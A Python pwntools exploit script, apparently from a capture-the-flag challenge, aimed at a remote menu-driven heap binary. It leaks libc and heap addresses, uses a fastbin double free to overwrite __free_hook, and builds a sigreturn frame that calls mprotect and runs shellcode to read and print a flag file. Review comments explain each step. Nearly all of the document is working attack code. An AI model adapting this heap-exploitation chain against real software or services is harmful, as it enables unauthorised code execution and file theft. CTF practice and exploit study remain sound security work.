from
PwnContext
import
*
try:
    # Optional: an IPython shell for poking at the session by hand. Nothing
    # below references `ipy`, so a missing IPython only costs this message.
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')
if __name__ == '__main__':
    # pwntools settings: open gdb in a horizontal tmux split and dump every
    # byte sent/received (the leaks below are read off this log when debugging).
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'

    # Thin I/O wrappers around the PwnContext `ctx` session. Everything sent
    # is coerced with str() so menu choices (ints) and raw payloads can be
    # passed interchangeably.
    def s(data):
        """Send `data` (str()-coerced) with no trailing newline."""
        return ctx.send(str(data))

    def sa(delim, data):
        """Wait for `delim`, then send `data` with no trailing newline."""
        return ctx.sendafter(str(delim), str(data))

    def sl(data):
        """Send `data` followed by a newline."""
        return ctx.sendline(str(data))

    def sla(delim, data):
        """Wait for `delim`, then send `data` followed by a newline."""
        return ctx.sendlineafter(str(delim), str(data))

    def r(numb=4096):
        """Receive up to `numb` bytes (a plain recv: a short read is possible)."""
        return ctx.recv(numb)

    def ru(delims, drop=True):
        """Receive up to `delims`; `drop` decides whether the delimiter is kept."""
        return ctx.recvuntil(delims, drop)

    def irt():
        """Hand the session over to the user."""
        return ctx.interactive()

    def rs(*args, **kwargs):
        """Start the target; the exploit below passes 'remote' to select the service."""
        return ctx.start(*args, **kwargs)

    def dbg(gs='', **kwargs):
        """Attach gdb, optionally running gdbscript `gs`."""
        return ctx.debug(gdbscript=gs, **kwargs)

    def uu32(data):
        """Unpack a leak of at most 4 little-endian bytes, zero-padded on the right."""
        return u32(data.ljust(4, '\0'))

    def uu64(data):
        """Unpack a leak of at most 8 little-endian bytes, zero-padded on the right."""
        return u64(data.ljust(8, '\0'))

    # Target binary and the CTF service it is exploited against. `symbols`
    # and `breakpoints` are offsets inside the binary for gdb (presumably
    # PIE-relative; only used when debugging locally).
    ctx.binary = './pwn'
    ctx.remote = ('122.112.231.25', 8005)
    ctx.symbols = {
        'mark1': 0x203060,
        'node': 0x203080,
    }
    ctx.breakpoints = [0x1557]
def lg(s, addr):
    """Print `s --> 0x<addr>` in bold red (ANSI) so leaked addresses stand out in the debug log."""
    line = '\033[1;31;40m{!s:>20}-->0x{:x}\033[0m'.format(s, addr)
    print(line)
def add(number, length, info='\n', name='\n'):
    """Menu option 1 (add): entry `number` with `name` and an `info` buffer of `length` bytes.

    Prompts are answered in the order the binary asks for them. `name` and
    `info` go out raw (no newline appended), so callers that want a line
    terminator must include '\\n' themselves.
    """
    steps = (
        (sla, '>>>', 1),
        (sa, 'Name', name),
        (sla, 'Number', number),
        (sla, 'len', length),
        (sa, 'Info', info),
    )
    for send, prompt, value in steps:
        send(prompt, value)
def delete(number):
    """Menu option 3 (delete) on entry `number`."""
    for prompt, value in (('>>>', 3), ('Number', number)):
        sla(prompt, value)
def edit(number, choice, length, info='\n'):
    """Menu option 2 (edit) on entry `number`: sub-choice `choice`, new `length`, then `info`.

    With `length` 0 nothing is sent after the length (the binary does not
    prompt for data in that case). `info` is sent raw, without a newline.
    """
    for prompt, value in (('>>>', 2), ('Number', number), ('>', choice), ('len', length)):
        sla(prompt, value)
    if length == 0:
        return
    sa('info', info)
def edit2(number, payload):
    """Menu option 2, sub-choice 1 (name) on entry `number`; `payload` is sent raw."""
    for prompt, value in (('>>>', 2), ('Number', number), ('>', 1)):
        sla(prompt, value)
    sa('name', payload)
def show(number):
    """Menu option 4 (show) on entry `number`; the caller parses what is printed."""
    for prompt, value in (('>>>', 4), ('number', number)):
        sla(prompt, value)
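# Run against the remote service (pass something else to rs() for a local run
# where dbg() is meaningful).
rs('remote')
# Two values the binary asks for before showing its menu; what it does with
# them is not visible from this script.
sa('String1:', '\x04\x01\n')
sa('String2:', '\x01\x70\n')

# --- libc leak ---
# A 0x90-byte request is above the default fastbin range, so freeing it leaves
# arena pointers in the chunk body (entry 1 presumably keeps it away from the
# top chunk); re-allocating the same size hands the chunk back with those
# pointers still in place, and show() prints them.
add(0, 0x90)
add(1, 0x20)
delete(0)
add(0, 0x90)
show(0)
# Take the 6 bytes ending in the 0x7f high byte of a userland pointer. The
# '\n' sent as Info presumably clobbers the pointer's low byte (0x0a) and the
# hard-coded offsets are tuned for that leak on the target libc —
# NOTE(review): confirm both against the service's libc.
libc_base = uu64(ru('\x7f', drop=False)[-6:]) - 0x3c4b0a - 0x100
# A libc base is page-aligned; stop on a bad leak instead of corrupting the
# heap with garbage addresses further down.
if libc_base & 0xfff:
    raise RuntimeError('libc leak is not page-aligned: 0x%x' % libc_base)
lg('libc_base', libc_base)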
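# --- heap leak ---
# Free two fastbin-sized chunks (3, then 2) so the chunk handed back by the
# next request (2) still carries a fastbin fd pointing into the heap.
add(2, 0x20)
add(3, 0x20)
delete(3)
delete(2)
add(2, 0x20)
show(2)
ru('Info:')
# Six raw bytes of a heap pointer. r(6) is a plain recv(), so a short read
# would silently produce a wrong value; the alignment check below usually
# catches that. -0xa presumably undoes the '\n' written over the low byte and
# -0x200 is that chunk's offset from the heap start (tuned for this binary).
heap_base = uu64(r(6)) - 0xa - 0x200
# The heap start is page-aligned, and the later SROP call with rdi=heap_base
# looks like it needs a page-aligned address anyway.
if heap_base & 0xfff:
    raise RuntimeError('heap leak is not page-aligned: 0x%x' % heap_base)
lg('heap_base', heap_base)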
# --- fastbin attack: carve a fake 0x70 chunk at heap_base+0x3a0 and use it to
# rewrite an entry record so that a later "edit name" writes into __free_hook.
# Entry 3's info begins with a fake header {prev_size=0, size=0x71}; the 0x71
# is what lets heap_base+0x3a0 pass malloc's fastbin size check once its
# address is pushed into the 0x70 bin below — NOTE(review): the distance from
# chunk 3's body to heap_base+0x3a0 is not visible here, confirm in gdb.
payload = p64(0) + p64(0x71) + '\n'
add(3, 0x30, info=payload)
# Entry 4 is filled with 0x21 words (name and info) — presumably plausible
# small size fields wherever this data is later reinterpreted as chunk headers.
add(4, 0x50, info=p64(0x21) * 10, name=p64(0x21) * 2)
add(5, 0x60)
add(6, 0x60)
# edit with length 0 sends no data (see edit()); the script relies on what the
# binary does in that case to make delete(5) below a double free — inferred
# from the fastbin-dup shape of the sequence, not visible from this script.
edit(5, 2, 0)
delete(6)
delete(5)
# Re-allocating entry 5 writes into the chunk just handed out: its first 8
# bytes are the fastbin fd, so the bin now leads to the fake chunk.
add(5, 0x60, p64(heap_base + 0x3a0) + '\n')
# Also stash "./flag" on the heap; the shellcode later open()s it from there.
add(6, 0x60, './flag\0', './flag\0')
# Presumably drains the remaining real chunk so entry 11 receives the fake one.
add(10, 0x60)
# __free_hook offset in the target libc (hard-coded, same libc as the leak).
free_hook = 0x3c67a8 + libc_base
# The fake chunk overlaps an entry record (presumably entry 4's {name, number,
# info} at +0x30 — inferred from how edit2()/delete() use it): point its name
# at __free_hook.
payload = p64(0) * 6 + p64(free_hook) + p64(4) + p64(heap_base + 0x190)
add(11, 0x60, payload)
# "Edit name" on entry 4 now writes through the redirected pointer, i.e. into
# __free_hook. libc+0x47b85 looks like setcontext+53 (the SROP frame built
# next is consumed via rdi, the pointer handed to free) — NOTE(review):
# confirm against the target libc.
edit2(4, p64(libc_base + 0x47b85))
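# --- register frame + shellcode ---
# SigreturnFrame() lays the frame out for context.arch, so pin the arch before
# building it (the original set it afterwards and relied on ctx.binary having
# already selected amd64).
context.arch = 'amd64'
frame = SigreturnFrame()
frame.rax = 0
# rdi/rsi/rdx = (heap_base, 0x1000, 7) looks like mprotect(heap page, RWX),
# with libc+0x101830 presumably being mprotect — NOTE(review): confirm against
# the target libc; rax is irrelevant if it is a function rather than a raw
# syscall gadget.
frame.rdi = heap_base
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = libc_base + 0x101830
# When that call returns, rsp is heap_base+0x960, where entry 12 (below)
# presumably lands and supplies the shellcode address as the return address.
frame.rsp = heap_base + 0x960
payload = str(frame)
add(13, 0xf0, info=payload)

# open("./flag") / read / write. The path is the "./flag" string stored on the
# heap by add(6, ...) earlier; its offset heap_base+0x6a0 is hard-coded.
shellcode = ""
shellcode += shellcraft.amd64.syscall("SYS_open", heap_base + 0x6a0, 'O_RDONLY', 0)
# Read from the descriptor open() actually returned (rax) instead of assuming
# it is 3 — the original hard-coded 3, which is wrong if the target holds any
# extra descriptor open.
shellcode += shellcraft.amd64.syscall("SYS_read", 'rax', heap_base, 0x40)
# Write back exactly the number of bytes read (rax) rather than a fixed 0x40.
shellcode += shellcraft.amd64.syscall("SYS_write", 1, heap_base, 'rax')
shellcode = asm(shellcode)
add(12, 0x90, p64(heap_base + 0x968) + shellcode)
# NOTE(review): the session was started with rs('remote'); dbg() only makes
# sense for a local run — presumably PwnContext ignores it for a remote
# target, otherwise drop this line before running against the service.
dbg()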
# Rewrite entry 4's record once more (through entry 11, which still overlaps
# it) so the pointer free() will receive is the chunk holding the register
# frame (heap_base+0x800, presumably entry 13) — field layout inferred from
# how edit2()/delete() used this record above.
payload = p64(0) * 5 + p64(0x21) + p64(heap_base + 0x800) + p64(4) + p64(heap_base)
# NOTE(review): the declared length is 0x68 but only 0x48 bytes are sent. This
# works only if the binary's read returns short (a single read() call); if it
# loops to fill 0x68 bytes, the "3\n" and "4\n" sent by delete(4) below would
# be swallowed as info data.
edit(11, 2, 0x68, info=payload)
# free(frame) -> __free_hook(frame): if libc+0x47b85 is setcontext+53 as
# assumed above, rdi is the frame and the gadget loads rsp/rip from it, which
# lands in the mprotect + shellcode chain set up earlier.
delete(4)
irt()